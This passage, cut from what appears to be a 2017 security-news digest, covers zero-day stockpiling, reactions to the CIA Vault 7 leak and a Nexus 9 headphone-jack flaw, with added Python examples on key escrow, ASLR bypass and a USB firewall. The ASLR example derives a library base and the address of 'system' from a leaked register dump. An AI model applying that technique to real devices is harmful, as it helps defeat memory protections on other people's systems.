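        self.public_keys, self.mailbox = {}, []

    def register(self, device_id: str, pub: int):
        self.public_keys[device_id] = pub

    def relay(self, to: str, message):
        self.mailbox.append((to, message))


def seize_and_decrypt(server) -> list:
    """What an investigator holding a forensic copy of the server can read."""
    escrow = getattr(server, "private_keys", {})
    return [decrypt(escrow[to], m) for to, m in server.mailbox if to in escrow]


def demo():
    note = b"meet at the dock at 3"               # constructed sample message
    # Design A: keys generated and kept on the provider's server.
    escrow = EscrowServer()
    bob_pub = escrow.provision("bob")
    escrow.relay("bob", encrypt(bob_pub, note))
    # Design B: keys generated on the handset; only the public key is uploaded.
    directory = DirectoryServer()
    bob_priv, bob_pub = gen_keypair()            # private key never leaves Bob's device
    directory.register("bob", bob_pub)
    directory.relay("bob", encrypt(bob_pub, note))
    return (seize_and_decrypt(escrow), seize_and_decrypt(directory),
            decrypt(bob_priv, directory.mailbox[0][1]))


if __name__ == "__main__":
    print(demo())
```

The seized escrow server gives up the plaintext; the directory server gives up nothing, and only Bob's handset can read the second copy. The caveat that survives even design B is the one the court filing notes: a provider that can remotely wipe or update the handset can also push a build that leaks the device key, so the provenance of the client software matters as much as where the key is generated.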

The police found a total of 7 TB of data on Ennetcom's central server in Canada and, with the keys, were able to access the encrypted messages.

In response, Ennetcom published a press release contesting the seizures, which the company says were carried out under false pretenses.


Zero-day Conundrum: Keep or Disclose Vulnerability Stockpiles?

11.3.2017 securityweek Vulnerability

Business Should Move to an Incident Response Security Posture and Accept that Governments Will Maintain Stockpiles of Zero-days

With striking timing, the RAND Corporation published a lengthy study of zero-day exploits stockpiled by governments just two days after WikiLeaks released its batch of documents on CIA hacking tools. While many have been surprised and even appalled that the government should maintain a stockpile of zero-day vulnerabilities and exploits, RAND seems to accept it as a matter of fact that all governments do so.

For the purpose of its research, "RAND obtained rare access to a dataset of information about zero-day software vulnerabilities and exploits." This dataset spans 14 years from 2002 to 2016, and contains information on more than 200 exploits and their vulnerabilities. More than half of these were still zero-days on March 1, 2017.

RAND describes itself as "a research organization that develops solutions to public policy challenges to help make communities throughout the world safer and more secure, healthier and more prosperous." In this study, it analyzes the life-span of a zero-day exploit with the intention of helping government policy on whether to stockpile or disclose.

"There is an ongoing policy debate," says the report (PDF), "of whether the U.S. government -- or any government -- should retain so-called zero-day software vulnerabilities or disclose them so they can be patched." The implication is that RAND's statistical analysis of the lifespan of the zero-day exploit will help government to decide whether to keep or disclose, because "many worry that keeping these vulnerabilities secret can expose people who use the vulnerable software to malware attacks and other attempts to collect their private information."

That worry, however, is not the study's main concern. The research is not about when government should disclose to keep the user safe, but when government should disclose because adversary governments also know about the vulnerability.


"If both sides have the same stockpiles, then some argue that there is little point to keeping them private -- whereas a smaller overlap might justify retention. But without information on the overlap, or concrete metrics based on actual data, it is challenging to make a well-informed decision about stockpiling," the report reads.

These challenges also complicate RAND's own research. An exploit remains a zero-day until the vendor patches the underlying vulnerability, and nothing limits the number of actors who may hold it in the meantime: a government, several adversary governments and any number of criminal groups can all know the same vulnerability while it is still a zero-day.

RAND acknowledges that refusing to disclose a vulnerability could be problematic for the user if it is also known to bad actors. It claims that its research "shows that the collision rates for zero-day vulnerabilities are nonzero." By this it simply means that not all zero-days in its sample were known only to its supplier. Most people will assume that the supplier is the US government; but it makes no difference to the argument.

"Some may argue that, if there is any probability that someone else (especially an adversary) will find the same zero-day vulnerability, then the potentially severe consequences of keeping the zero-day private and leaving a population vulnerable warrant immediate vulnerability disclosure and patch. In this line of thought, the best decision may be to stockpile only if one is confident that no one else will find the zero-day; disclose otherwise."

The difficulty here is the impossibility of knowing absolutely whether an adversary or criminal bad actor has that vulnerability until or unless it is used and discovered; by which time disclosure will be too late to benefit the victim. The implication is that governments knowingly accept that in stockpiling vulnerabilities there may be collateral damage among the user population that could have been prevented had the vulnerabilities been disclosed rather than kept.

"RAND talks about stockpiling 'either for defensive purposes (e.g., penetration testing) or offensive operations'," comments ESET senior research fellow David Harley. "Noticeably absent from that sentence is any suggestion of disclosure for the benefit of potential victims... Leaving aside the issue of internal testing, which in times of economic stringency is probably honored more in the breach than the observance, I'd guess that the main potential conflict is between direct danger to the IT-using population as a whole, and disclosure as a perceived threat to national security (for instance, by endangering the effectiveness of a planned or ongoing offensive operation). Complicated, perhaps, by factors such as the urgency of the issue, the number and grouping of people potentially affected, and so on."

This question of national security versus public benefit was also noticed by Eric O’Neill, national security strategist at Carbon Black; but he suggests the onus is on government to be able to make a reasonable judgment. "The key thing to consider here is that software vulnerabilities are weapons and should be treated as such," he explained. "When issues of national security are concerned, governments should be protecting these weapons and preventing them from getting in the wrong hands at all costs. When national security is not involved, the government should conduct a transparent dialogue with concerned parties to ensure that these weapons are known about, patches are created and then widely deployed."

The point, he added, is that government cannot excuse itself from all liability to business. "If there is a high probability that zero-days will get into the wrong hands, and these zero-days do not directly conflict with national security interests, the government should act responsibly and disclose appropriately on an agreeable timeline," he added.

"This disclosure should include detailed notification about the vulnerability, recommendations for patching and a proposed timeline for patch deployment. This level of transparency keeps the interests of all parties in mind. Simply mass stockpiling all vulnerabilities or disclosing all vulnerabilities on a macro level leaves too many potential gaps. Vulnerabilities need to be handled like weapons and how communication about these weapons occurs is critical to security."

RAND's conclusions on the implications of its study 'for defense and offense' are no more reassuring for business. It makes no comment on whether government should automatically disclose the vulnerabilities it finds, but instead says business should improve its general defensive posture. "Defenders likely need better options to both find zero-day vulnerabilities and detect when a system or software package is being exploited. In addition, rather than focusing only on finding zero-day vulnerabilities, defenders may be able to shift the balance in their favor by starting from the assumption of compromise, investigating ways to improve system architecture design to contain the impact of compromise, and adopting different techniques to identify vulnerabilities."

In other words, RAND's advice is standard contemporary advice: business should move to an incident response security posture; and simply accept that government will have and maintain its own stockpile of zero-days.

It may also be worth noting that the WikiLeaks disclosures probably come nowhere near the CIA's actual stockpile. If we assume that RAND got its dataset from the US government, then, by RAND's count, the majority of those vulnerabilities were still unknown as of March 1, 2017. Industry response to the WikiLeaks disclosures, however, suggests that the majority of the vulnerabilities are old and already patched. The two datasets appear at this stage to be completely different.


Industry Reactions to CIA Hacking Tools: Feedback Friday

11.3.2017 securityweek BigBrothers
WikiLeaks this week released information on what it claims to be a trove of CIA hacking tools. The documents made public appear to show that the intelligence agency has had the tools and capabilities to hack a wide range of systems, including mobile devices, routers, TVs and even cars.

An initial analysis conducted by tech companies, including security firms, showed that a majority of the disclosed vulnerabilities have already been patched by vendors.


WikiLeaks initially refused to release any of the actual tools and exploits, but it has now promised to share more information with tech firms in an effort to help them protect their customers. However, the White House warned that there could be legal repercussions considering that the information is classified.

The CIA has not commented on the authenticity of the leak, which has been dubbed “Vault 7,” but the agency pointed out that it is legally prohibited from spying on individuals in the United States.

Contacted by SecurityWeek, industry professionals shared some thoughts on the Vault 7 leak and its implications.

And the feedback begins…

Ilia Kolochenko, CEO, High-Tech Bridge:

"I am a bit surprised that this particular incident has attracted so much attention. The CIA, like any other governmental intelligence agency, uses and will continue using various hacking tools and techniques to obtain any information they need to protect the country. This is their duty. So far, we don't have any evidence that these capacities were used unlawfully, for example to violate the reasonable expectation of privacy of innocent US citizens or for illicit interference with elections.

It's also at least incorrect to speak about the CIA's inability to defend itself, as the source of the leak remains unknown. This can be an insider incident, against which no large company or governmental agency is protected in any country. It can also be a honeypot, to distract someone's attention from the real arsenal of US cyber warfare. I am pretty confident that US intelligence has much bigger technical resources than the garbage exposed in the leak.

Also, intelligence agencies cooperate in many areas, including cybersecurity and cyber warfare. Therefore, the CIA's collaboration and knowledge sharing with other agencies, such as MI5, is obvious and is a common practice."
Tom Kellermann, CEO, Strategic Cyber Ventures (SCV):

“These exploits and attack platforms allow for an actor to become telepathic. It is quite obvious that this was an act of tradecraft by a foreign power to discredit the US government and to endow dangerous attacks capabilities to the cybercriminal community. The blatant pillaging of the US cyber armory will result in a dramatic escalation of the cyber-insurgency which is raging in US cyberspace. These cyber weapons will be used by the Russian cyber militias against NATO and Western targets. Wikileaks has expanded her arms bazaar and is now distributing digital grenade launchers and uzis to the malcontents and anti-American non-state actors of the world. Cyberspace is about to become a free fire zone.”
Rick Hanson, EVP, Skyport Systems:

“This is just another clear example where an organization that conducts breaches and leaks cannot be praised under ANY circumstance. Donald Trump previously praised WikiLeaks during his campaign. When an organization like WikiLeaks is lauded in any forum there is reason to be concerned. The fact that WikiLeaks claims to have critical CIA information should put our intel community on record.

The protection of sensitive tools and data by our intel community should be a top priority. If this leak turns out to be a reality, our governmental cybersecurity policy and implementation needs to be called into question. A key reason our intel community needs to operate only on "Zero Trust" systems with a hardware root of trust."
Ayal Yogev, VP of Product Management, SafeBreach:

“Any type of device you add to the network can be used by an attacker. This isn't new, but the information shared by Wikileaks about SmartTVs reinforces this. Additionally, while most may consider this a consumer-focused issue, in fact, SmartTVs are used by many enterprises in conference rooms and common areas. Imagine the types of executive level conversations an attacker might be privy to.

These new IoT devices are prime targets for an attacker since in many cases they are less protected than existing devices on the network and an attacker always looks for the weakest link. This is why knowing exactly what can be done from any point in your environment by a hacker is crucial. Understanding the kill chain can help enterprises prevent attacks, for example - a SmartTV may be hacked, but because there is no way to exfiltrate information from the segment the TV is in, you're breaking the kill chain, and containing the problem.”
Alex Rice, CTO, HackerOne:

"Vulnerabilities are difficult to keep secret, and this news break shows they don’t remain secret for long. The longer these vulnerabilities remain unpatched, the more dangerous they become because they can fall into criminal hands. The CIA put consumers at risk by not reporting these bugs to their vendors. Similarly, WikiLeaks is no better at keeping secrets than the CIA and should immediately disclose any known vulnerabilities to the appropriate vendors so they can be fixed.

If there is a known vulnerability and it is not making it into the hands of the vendor so it can be resolved, something is broken. Companies and consumers should encourage the active disclosure of vulnerabilities no matter their source; this includes security researchers, active security teams, and the U.S. government. At minimum, this means a thorough review of the U.S. Government's Vulnerabilities Equities Process, which appears to have not been honored. This ultimately strains tech companies' relationship with the US government. The economy relies significantly on the trust of its consumers and if consumers can’t trust U.S.-made tech products, this harms competitiveness in the market."
Mikko Hypponen, Chief Research Officer, F-Secure:

“It’s no surprise that the CIA is using these hacking techniques. What is unexpected is the leak, and it’s huge. So the question is who leaked it to WikiLeaks? The Russians, an insider? We don’t know the answer. Another question we need to ask ourselves is why it was leaked now. We don’t know this either.

In countries like the US, the intelligence agencies’ mission is to keep the citizens of their country safe. The Vault7 leak proves that the CIA had knowledge of iPhone vulnerabilities. However, instead of informing Apple, the CIA decided to keep it secret. So the leak tells us a bit about how the CIA decided to use its knowledge: it considered it more important to keep everybody insecure than to protect its citizens from the vulnerability, and maybe use the vulnerability for its own purposes or counter-terrorism purposes.”
Nathan Wenzler, chief security strategist, AsTech:

“Could this be the age of the EULA? There have been many reports and lawsuits in recent months (Vizio and Samsung come immediately to mind) of devices such as televisions recording information and potentially providing it to "third parties." Is it really any surprise to the security industry that these third parties might include government agencies such as the CIA? Where backdoors exist, there is often language present in the EULA that would suggest that the manufacturer may capture and share information.

We certainly want to believe that companies operate to the highest standards of protecting users' privacy, but there have simply been too many cases where intelligence agencies have publicly attempted to gain this sort of backdoor access through legal channels (FBI vs. Apple, anyone?) to think that no company is cooperating with these authorities. It may be time to make a serious review of licensing agreements and terms of service a standard part of our security programs, rather than the standard de facto process of blindly clicking "OK" at the bottom of the page. This doesn't necessarily make it right, moral or ethical, but the writing has been on the wall the whole time, and these recent revelations should not come as a surprise, but rather serve as confirmation of what we have always believed was happening.”
Sanjay Kalra, Co-founder and Chief Product Officer, Lacework:

“There has been a lot of focus on the CIA leaks around exploits for Smart TVs, connected vehicles and a lot of new gadgetry. If you look closely at the list of projects, the majority of them were focused on Unix. Unix systems are considered to be extremely safe; however, the CIA had tools to do keyboard logging, copy network traffic and intercept secure connections to Unix machines. Unix runs and stores the crown jewels in the data center/cloud for most enterprises today and exploiting them is a gold mine. Enterprises need to first focus on securing their core with breach detection and insider threat detection before looking to secure the next shiny object. Compromise of the core can be disastrous.”
Chris Roberts, Chief Security Architect, Acalvio:

“One thing that is interesting is the mass of misdirected social media indignation and ill-informed discussions about who’s been hacking where, what and when. The open library of “wild” code that is being attributed to various CIA branches is nothing more than data collected freely available on the Internet; therefore attributing hacks to the CIA because of the code fingerprints is woefully incorrect. That’s damaging both for a community not doing its research and for the intelligence community, which is sitting there battered and bruised because of these losses AND now taking the heat for attacks it likely has not done (Trump, DNC etc.).

The biggest issue is ‘we know’ most of what’s been disclosed, including hacks, code and covert operation styles. We also know what the tactics are. Heck, most of us use the very same tactical operations when engaged by clients or doing R&D. The code library is NICE to have in one place. But again, most of us have multiple snippets of various code bases.

What needs to happen now is that the intelligence community must stand up and simply say “yep, that’s us. We are at war in the electronic realm. Suck it up."
Willis McDonald, Senior Threat Manager, Core Security:

"The leaked CIA documents have potentially disastrous effects on ongoing CIA operations. If the tools detailed in the documents are still in use this now gives clues to targeted organizations as to what is of interest to the CIA. As a consequence this could also expose close contact human intelligence (HUMINT) operations leading to incarceration and possible harm to operatives.

The leak of these documents definitely has caused financial harm to the CIA. Response to the leak of the documents will require a massive research and retooling effort in the CIA. Everything from tradecraft to tools will need to be changed in order for operations to continue undetected which will cost millions of dollars and months of training and development."
Ajay Arora, CEO and Co-founder, Vera:

"If these docs prove to be authentic, everyone should once and for all throw out their blind trust that their devices, apps or data are ever safe or private. People need to wake up to the fact that they need to take responsibility for maintaining the privacy of their information and make no assumptions. At the end of the day, no one has your best interests in mind but you; people can't even trust their own government any more. This is the tragic new normal we all have to unfortunately accept."
Apostolos Giannakidis, Lead Security Architect, Waratek:

"The Wikileaks release of the CIA's Vault 7 hacker tools is a dream come true for hackers and a nightmare for corporate security teams who are already under-resourced and over-stressed just trying to keep up with known threats, especially in application software.

This event highlights the risk of introducing new software code into an enterprise environment, especially from third parties. Blindly putting unrestricted trust in software can greatly increase the risk of introducing new vulnerabilities and even hidden backdoors.

There are tools that can automate the process of identifying and increasing protection against these threats, but the attacks are likely to come faster than the defenders can implement them. It will take security teams weeks, months or even years to develop patches to address the exploits about to be unleashed into the mainstream over time.”
Gunter Ollmann, CSO, Vectra Networks:

“The CIA’s “UMBRAGE” program reveals the importance placed upon “false flag” signatures used in clandestine operations. It should be no surprise to the InfoSec community that such resources are expended to capture and duplicate the techniques used by foreign agencies and criminal organizations. It does however reinforce that the use of such techniques are, in fact, an everyday part of clandestine operational procedure – casting further doubt on public attribution disclosures – especially those quickly released and promoted by the marketing teams of commercial security vendors.”
Brian Vecci, Technical Evangelist, Varonis:

“It’s too easy for data to be stolen, even—allegedly—within the CIA’s Center for Cyber Intelligence. The entire concept of a spook is to be covert and undetectable; apparently that also applies to actions on their own network. According to WikiLeaks, this treasure trove of files was given to them by a former U.S. government contractor. The CIA is not immune to issues affecting many organizations: too much access with too little oversight and detective controls.

In performing forensics on the actual breach, the important examination is to determine how 8,761 files just walked out of one of the most secretive and confidential organizations in the world. Files that were once useful in their operations are suddenly lethal to those same operations. We call this toxic data: anything that is useful and valuable to an organization but, once stolen and made public, turns toxic to its bottom line and reputation. All you have to do is look at Sony, Mossack Fonseca and the DNC to see the effects of this toxic data conversion.”
Philip Lieberman, President, Lieberman Software:

“Presidential Directive 20 and Title 10 provide transparency to the strategy and resources of the US Government regarding methods and technologies used for national security purposes. The creation, capabilities and usage of cyber weapons is controlled by the Senate, Congress and President in a coordinated process governed by law. The agencies themselves do not operate independently or autonomously without first receiving detailed authorization and direction from national leadership, and it is vetted by the judicial branch.

Questions as to the capabilities and usage of those capabilities should be directed to the Senate and President directly rather than the agencies themselves as they simply carry out operations directed from above them.

The appropriateness and usage of capabilities is a matter of politics and national security that may or may not disturb citizens. My advice is to contact your representative in Congress and the Senate and ask them for an explanation as to why and how these capabilities are used.”


Google Protects Nexus from Malicious Headphones

11.3.2017 securityweek Virus
One of the issues Google addressed earlier this week in its latest set of Android security patches left Nexus 9 devices vulnerable to malicious headphones, a team of security researchers reveals.

Tracked as CVE-2017-0510 and rated Critical severity, the flaw is described as an elevation of privilege vulnerability in the kernel FIQ debugger that “could enable a local malicious application to execute arbitrary code within the context of the kernel.” The issue could lead to a local permanent device compromise, which would require reflashing the operating system to repair the device.

The bug was found by Aleph Research, a team of former IBM X-Force researchers. Through this unusual attack vector, the team was able to leak stack canaries, derandomize ASLR (address space layout randomization), trigger a factory reset, and even reach HBOOT, which allowed them to communicate with internal System-on-Chips (SoCs).

In a blog post authored by Roee Hay, Aleph Research explains that attacks via multiplexed connectors were first detailed in a Black Hat 2013 paper that focused mainly on USB ports and only briefly mentioned audio connectors. At the time, the Nexus 4 was found to include a “TTL UART interface hidden in its headphone jack, a functionality which is enabled if the voltage on the MIC pin exceeds some threshold,” and all Nexus devices, as well as the Pixel, are now known to have this functionality.

The researchers discovered that the FIQ (Fast Interrupt Request) Debugger could be accessed on the Nexus 9, although without a shell on production builds. Hay notes that “FIQ Debugger functionality is enabled even if the UART cable is inserted when the platform is up,” and explains that the supported commands allow a lot of information to be exfiltrated by interacting with the FIQ Debugger.

An attacker, Hay reveals, can dump the process list, use the console command to view the kernel log and obtain an unprivileged shell (on userdebug and eng builds only), and dump the registers and call stack as well.

“Unlike a normal debugger we cannot modify memory and/or place breakpoints, however since the FIQ preempts, the dumped information will be of an arbitrary process,” Hay explains.

The team then focused on whether the attack vector could be used to leak sensitive information, and eventually leaked the stack canary of the Zygote process. Zygote is the process from which almost every Android app is forked, so the system libraries and frameworks it has loaded, and with them its stack canary and memory layout, are inherited by all of those apps (malware such as Triada has abused Zygote to infect every process); a canary leaked from Zygote is therefore valid for any app on the device.

The researchers were also able to show that the attack significantly weakens ASLR, since the register dumps expose the CPU context of arbitrary processes, including code and return addresses, from which the randomized base of a mapping can be computed.
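How a leaked register context defeats ASLR, as an added example that is not Aleph Research's code or output: ASLR slides a mapping by whole pages, so the low 12 bits of a leaked code address survive randomization and identify which known function the CPU was executing; subtracting that function's offset in the unslid library gives the mapping's base, and every other function in the library follows. The dump format, the addresses and the libc offsets below are all constructed for the example, and `LIB_SIZE` is a hypothetical mapping size; the second dump models the caveat the researchers note, namely that the FIQ preempts whatever process happens to be running, so a dump may belong to an unrelated process and has to be sanity-checked.

```python
import re
from typing import Dict, Optional

PAGE = 0x1000
LIB_SIZE = 0x100000      # hypothetical size of the library mapping

# Constructed register dump, loosely modeled on a Linux arm64 register
# listing; every address here is made up for this example.
LEAKED_DUMP = """\
pc : 0000007f9a3c5d34
lr : 0000007f9a3c5d20
sp : 0000007fc8a1e0b0
x30: 0000007f9a3c5d20 x29: 0000007fc8a1e0b0
x19: 0000007f9a1f0000 x18: 0000000000000000
"""

# Constructed dump of a context that does NOT belong to the targeted process:
# the low bits of pc happen to match, but lr points somewhere else entirely.
OTHER_PROCESS_DUMP = """\
pc : 0000005a1b2c5d34
lr : 0000007f12345678
sp : 0000007fd0000000
"""

# Hypothetical unslid offsets inside the target's copy of libc.so, as an
# attacker would read them from the firmware image (names and values are made up).
LIBC_OFFSETS = {"__epoll_pwait+0x14": 0x5d34, "mprotect": 0x5f20, "system": 0x7ab0}

REG_RE = re.compile(r"\b(pc|lr|sp|x\d+)\s*:\s*([0-9a-f]{16})\b")


def parse_regs(dump: str) -> Dict[str, int]:
    """Pull every 'name : hex' register pair out of a dump."""
    return {name: int(val, 16) for name, val in REG_RE.findall(dump)}


def candidate_bases(pc: int, offsets: Dict[str, int]):
    """Symbols whose page offset matches the leaked pc, with the implied base."""
    for sym, off in offsets.items():
        if (pc & (PAGE - 1)) == (off & (PAGE - 1)) and pc >= off:
            yield sym, pc - off


def derandomize(dump: str, offsets: Dict[str, int]) -> Optional[dict]:
    """Recover the library base from one dump, or None if the dump is unusable."""
    regs = parse_regs(dump)
    for sym, base in candidate_bases(regs["pc"], offsets):
        # Second leaked register as a consistency check: the return address
        # should land inside the same mapping if this is really our process.
        if 0 <= regs["lr"] - base < LIB_SIZE:
            resolved = {s: base + o for s, o in offsets.items()}
            return {"base": base, "matched": sym, **resolved}
    return None


if __name__ == "__main__":
    for label, dump in (("target", LEAKED_DUMP), ("other", OTHER_PROCESS_DUMP)):
        result = derandomize(dump, LIBC_OFFSETS)
        print(label, "->", None if result is None else hex(result["base"]))
```

With a single matching dump the whole library is resolved (`system` lands at base + 0x7ab0 here); with several candidate symbols sharing a page offset, repeated dumps or a second register narrow the choice. The defensive reading is the one Google took: a debug interface that prints register state to whoever holds the cable is an ASLR oracle, and it has to be disabled once the platform is up.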

Next, they attempted to move beyond the limits of the FIQ Debugger prompt, and were able to force a reboot into HBOOT from it by entering the reboot oem-42 command. This boot mode allows an attacker to interact with I2C-accessible chips, the researchers discovered. A factory reset could also be triggered, Hay notes.

“Google has patched the vulnerability by reducing the capabilities of the FIQ Debugger. When the platform is up, it’s no longer possible to dump the registers nor reboot with an oem-N parameter (preventing reboots into HBOOT and Factory Resets). Issuing reboot oem-42 now results in a normal reboot,” the researcher concludes.


Cyber Attack Simulation Startup Cymulate Raises $3 Million

11.3.2017 securityweek Cyber
Cymulate Raises $3 Million in Series A Funding to Expand Cyber Attack Simulation Business

Israel-based cybersecurity startup Cymulate announced on Friday that it has raised $3 million through a Series A round of financing led by investment firm Susquehanna Growth Equity.

Founded by Eyal Wachsman and Avihai Bar Yosef, the Israel-based company offers a cloud-based cyber attack simulation platform that helps organizations assess the security of various systems, such as email, Windows Domain Network configurations, web servers, web traffic, and more.

“Through a game-changing combination of offensive/defensive security and SaaS platform, Cymulate helps organizations expose critical vulnerabilities in their security infrastructure before an actual attack takes place,” the company explains.

Customers can run a one-time security assessment for $9,999, with other plans available for enterprise customers and service providers.


Absolute privacy does not exist, says FBI director
10.3.2017 Novinky/Bezpečnost BigBrother

Absolute privacy does not exist in the USA, according to the current director of the Federal Bureau of Investigation (FBI), James Comey. "Even our memories are not absolutely private in America," he said at the private Boston College during a conference on cybersecurity, CNN reported.

He explains his words by saying that there is always the possibility that a person will be called upon to entrust a court with confidential information from their life, although there are certain limits in this respect. "Nevertheless, the basic principle, which we have always accepted in this country, is that there is no absolute privacy in America," the FBI chief said.

The statement came at a time when the case of the publication of alleged secret CIA documents, which revealed a broad spectrum of tools and techniques used by the intelligence service for surveillance via the internet, is resonating not only through the technology world.

Comey is troubled by the current trend of securing communication applications, as well as the devices themselves. It makes the FBI's work considerably harder. To illustrate: in the last four months of last year, the FBI gained access to 2,800 devices as part of investigations. It managed to get into only 1,200 of them.

The head of the agency believes that certain necessary compromises on privacy for the sake of increased security would have been tolerated even by the so-called Founding Fathers, the statesmen who in their time helped bring about the creation of the United States.


Is the CIA spying on us?

10.3.2017 SecurityWorld BigBrother
The current WikiLeaks vs CIA affair fills the front pages of the world's media, and a logical question comes to mind: should we fear for our privacy?

The intelligence agency, of course, faces criticism.

"Instead of spying on citizens and breaking the security measures of smart devices, shouldn't it rather cooperate with manufacturers on improving them?" ask some.

"If an agency that tries to protect our security and expose criminals did not use every means to eavesdrop on others, it would not be doing its job," others object, adding that the public should be "encouraged" rather than worried by the published documents.

"Most of them concern specific targets. This is not mass spying and collection of data for the purpose of looking for a needle in a haystack," notes Alan Woodward, a security adviser to Europol, in an interview with the BBC. "Moreover, they need a court warrant for that; they can't just tap any phone they like. One of the reasons people trust the security services is that they abide by the law. And when they don't, it comes out. If WikiLeaks got hold of the code the CIA was working with, it is their responsibility not to publish it, because otherwise they would also be making it available to criminals and ordinary citizens would be put at risk. The CIA had a reason to keep it secret."

The well-known whistleblower Edward Snowden added fuel to the fire by writing the following on his Twitter account: "Imagine a world in which the CIA thinks about how to spy on you through your television. That is the world we live in today." (In fairness, it should be added that the methods of spying through smart TVs described in the leaked documents require an external device to be connected, i.e. physical entry into the person's home.)

"The reports show that the US government is creating these vulnerabilities in American products and deliberately leaving them open. And why is that dangerous? Because until they are closed, any hacker can exploit these holes the CIA left open and get into any iPhone in the world," Snowden writes further.

Woodward counters: "We are talking about the CIA, not a security agency. If they know about those weaknesses, they will use them. Managing them is up to others."

So should we worry about privacy intrusion or not? For an intelligence agency, mass surveillance of the public would probably make little sense and, above all, would most likely be infeasible, both financially and in terms of staffing requirements. Mike McLellan, a former UK government cybersecurity official, however, points out another worrying fact in this context: similar software holes are also sought out by private companies, which then sell them to whoever offers the highest price.

In the future, larger-scale surveillance may also be made easier by the development of artificial intelligence, which could recognise the relevance of monitored data more easily and quickly.

Don Smith of the security firm SecureWorks, however, offers at least partial reassurance: "It is just one of many risks that await us in the future as technology develops. Just imagine the amount of data that would have to be processed. It is not possible to record every phone in the world, let alone every phone call. So if you are not the focus of their interest, they do not have the capacity for you."


A USB firewall will protect you from a malicious device
10.3.2017 Root.cz Zabezpečení

If you are really serious about security, you should consider building or buying a USB firewall. The small device sits between the computer and the electronics you want to plug into USB.
Under normal circumstances your computer accepts every device you plug into USB. In many cases that is fine, because the user simply wants to plug in and use it. But more and more often there is talk of new attack methods that use hardware. While software attacks can be defended against with proper system configuration, security modules (LSM) or an antivirus (on some platforms), defending against malicious hardware is hard.

Modified hardware can attack a bug in the drivers or can pose as a different device than it really is. Nothing then stops it from collecting data on the system, installing further applications on it, or, for example, posing as a network card and redirecting all traffic through itself. Such purposes used to require modified devices with added electronics; today it is enough to modify the firmware in a flash drive and turn it into an attack device.

It looks like a hard drive, but inside is a flash drive and a small computer with an evil plan
The problem is that no application in the system can catch such behaviour. Commands from the device are received and executed directly by the driver and the operating system, and software inside has no idea of the malicious activity from outside, unless you deploy something like USBGuard.

Developer Robert Fisk has come up with an interesting and universal solution: a USB firewall called USG (G as in Good, instead of B as in Bad). It is hardware that you connect between the computer and the potentially dangerous device. This isolates both sides, with the inserted firewall passing only safe commands and data.

USG usage diagram
Inside the device are two STM32F4 processors, each connected to USB on the outside and connected to each other by a high-speed SPI bus. The first version of USG uses 12 Mbit/s (full-speed USB) hardware, so if you connect a flash drive through it you will talk to it at roughly 1 MB/s. According to the author, high-speed hardware could be made as well, but its development would cost a lot of money.

The processor closer to the computer then accepts only a very limited set of USB commands, so a potential attack will not succeed. Both sides are protected: the flash drive in use cannot attack the computer, and likewise a foreign computer cannot modify the firmware in your flash drive.

Actual appearance of USG
USG also improves security by allowing only one device to be connected at a time. That does make it impossible to use various USB hubs or docking stations, but it prevents the use of fraudulent devices that can hide multiple functions in one, such as a keyboard with an integrated flash drive.

At the same time, a device cannot change its identification at runtime. That is the way a modified flash drive can briefly declare itself a keyboard, perform a set of attack commands and then return to its original function. USG prevents such metamorphoses, so a connected device cannot change its function until it is disconnected and power is re-applied.

Because of the limited command set, the list of devices that will work behind USG is also limited. At the moment the author lists flash drives (mass storage), keyboards and mice. Further firmware versions could then add more device types if needed.

Of course, even a legitimate-looking device can perform dangerous actions, so it is possible to add rules for specific devices restricting their activity. For example, a keyboard should not be able to send characters much faster than a human can type. The author is still working on these advanced rules.

The USB firewall packaged and ready
If this device has caught your interest, know that it is open hardware with open firmware. Details can be found on GitHub, where the author also offers the option of ordering a USG for roughly 60 dollars, i.e. about 1,500 CZK.
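The policy the preceding paragraphs describe (one device at a time, only mass storage / keyboard / mouse, no descriptor change without a power cycle, and a keystroke rate limit) can be expressed as a small policy engine. The following is an added example written for this page, not the USG firmware or any code by its author: it models USB enumeration as constructed descriptor events, runs them through the policy, and shows where a BadUSB-style device is stopped. The vendor/product IDs and the 15 keys/second threshold are assumptions for illustration.

```python
from dataclasses import dataclass, field
from typing import List, Optional

# USB interface class codes (standard USB class code list).
CLASS_HID = 0x03
CLASS_MASS_STORAGE = 0x08
# HID boot-interface protocols.
HID_KEYBOARD = 1
HID_MOUSE = 2
# Device types the article says the USG firmware passes today.
ALLOWED = {(CLASS_MASS_STORAGE, 0), (CLASS_HID, HID_KEYBOARD), (CLASS_HID, HID_MOUSE)}
# Assumed injection threshold (not from the article): more than this many keys in
# any one-second window is treated as scripted keystroke injection, not typing.
MAX_KEYS_PER_SECOND = 15


@dataclass
class Descriptor:
    """Minimal stand-in for what enumeration reveals: vendor/product ID and the
    (class, protocol) pair of each interface the device announces."""
    vid: int
    pid: int
    interfaces: List[tuple]  # [(class, protocol), ...]


class PolicyViolation(Exception):
    pass


@dataclass
class UsbFirewall:
    device: Optional[Descriptor] = None
    _key_times: List[float] = field(default_factory=list)

    def plug(self, desc: Descriptor) -> str:
        """Enumerate a newly powered device; anything not explicitly allowed is refused."""
        if self.device is not None:
            raise PolicyViolation("one device at a time: unplug the current one first")
        if len(desc.interfaces) != 1:
            raise PolicyViolation("composite device refused (e.g. keyboard + storage in one)")
        iface = desc.interfaces[0]
        if iface not in ALLOWED:
            raise PolicyViolation(f"interface class/protocol {iface} not in allow-list")
        self.device = desc
        self._key_times = []
        return f"allowed {desc.vid:04x}:{desc.pid:04x} as {iface}"

    def redescribe(self, desc: Descriptor) -> None:
        """A device re-announcing a different descriptor without a power cycle is the
        'flash drive briefly becomes a keyboard' trick; it is always refused."""
        if self.device is None:
            raise PolicyViolation("no device powered")
        raise PolicyViolation("descriptor change without power cycle refused")

    def unplug(self) -> None:
        self.device = None
        self._key_times = []

    def keystroke(self, t: float) -> int:
        """Forward one key event at time t (seconds); returns keys seen in the last second."""
        if self.device is None or self.device.interfaces[0] != (CLASS_HID, HID_KEYBOARD):
            raise PolicyViolation("keystroke from a device not enumerated as a keyboard")
        self._key_times = [x for x in self._key_times if x > t - 1.0] + [t]
        if len(self._key_times) > MAX_KEYS_PER_SECOND:
            raise PolicyViolation(f"{len(self._key_times)} keys/s: keystroke injection suspected")
        return len(self._key_times)


def run_events(events) -> List[str]:
    """Apply a constructed event list ('plug', 'redescribe', 'unplug', 'key') and
    return one decision string per event; the first violation ends the session."""
    fw = UsbFirewall()
    log = []
    for ev in events:
        try:
            if ev[0] == "plug":
                log.append(fw.plug(ev[1]))
            elif ev[0] == "redescribe":
                fw.redescribe(ev[1])
            elif ev[0] == "unplug":
                fw.unplug()
                log.append("unplugged")
            elif ev[0] == "key":
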